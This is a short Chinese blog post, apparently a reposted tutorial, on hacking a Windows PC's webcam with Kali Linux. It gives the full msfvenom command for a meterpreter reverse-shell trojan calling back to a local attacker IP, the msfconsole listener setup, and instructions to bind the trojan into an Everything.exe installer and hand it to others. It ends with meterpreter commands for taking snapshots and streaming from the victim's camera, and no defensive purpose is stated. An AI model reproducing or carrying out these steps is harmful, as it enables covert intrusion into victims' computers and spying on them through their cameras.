Kali入侵网络摄像头 Kali入侵网络摄像头流程简述 查询Kali攻击机的IP地址 ifconfig 生成一个木马程序 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.24 lport=5000 -f exe -o barry.exe 此时在kali电脑桌面上就生成了一个名为barry.exe与被控机反向连接的程序。 开启监听程序,在kalik 打开 msfconsole 1. msf6>use exploit/multi/hander 2. set payload windows/meterpreter/reverse_tcp 3. set lhost 192.168.31.24 4. set lport 5000 5. run 等木马上线并运行即可。 生成的木马在被控机上是很容易被发现而且不会被安装的,此进需要将barry.exe程序进行绑定处理,本例以绑定Everything.exe程序为例。然后再在被控机上安装即可。【准备好barry.exe Everything.exe xx.ico 用安防文件捆绑器】 用安防文件捆绑器将以上三个文件进行捆绑。生成一个aqiyi.exe的有木马的Everything 将这个绑定好的aqiyi.exe给别人安装即可。当被控机安装以后就可以发现已经上线了, – webcam_list //查询有哪些摄像头 – webcam_snap -i 1 //截图 – web_stream -i 1 //打开摄像头 Post Views: 83 打赏赞分享 kali 系统安全 转载请注明出处: https://www.cntworld.cn 智能工控 » Kali入侵网络摄像头